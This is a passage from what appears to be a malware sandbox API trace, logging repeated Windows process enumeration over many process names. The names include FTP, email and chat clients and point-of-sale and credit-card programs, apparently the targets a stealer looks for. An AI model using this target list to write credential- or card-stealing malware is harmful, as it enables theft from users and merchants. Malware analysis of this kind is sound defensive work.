th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0289.813] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0289.814] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0289.816] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0289.817] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0289.819] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0289.820] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0289.822] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0289.850] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0289.852] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0289.854] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0289.856] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0289.857] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0289.859] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0289.861] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0289.863] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0289.864] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0289.866] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0289.867] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0289.869] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0289.907] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0289.909] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0289.911] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0289.912] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0289.914] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0289.916] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0289.920] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0289.922] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0289.924] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0289.925] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0289.927] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0289.929] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0289.930] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0289.932] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0289.937] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0289.938] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0289.940] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0289.942] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0289.943] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0289.945] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0289.946] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0289.999] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0290.001] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0290.003] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0290.004] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0290.006] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0290.008] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0290.009] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.015] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0290.017] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0290.018] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0290.020] CloseHandle (hObject=0x21f8) returned 1 [0290.020] Sleep (dwMilliseconds=0x64) [0290.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0290.151] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.155] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.157] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.158] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.159] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.161] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.162] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.164] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.165] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.167] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.171] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.172] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.174] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.176] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.178] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.180] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.182] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.214] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.216] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.217] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.219] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0290.220] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0290.221] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.223] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.224] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0290.226] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0290.227] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0290.229] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0290.234] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.235] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0290.237] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.238] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.240] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.241] Process32Next (in: 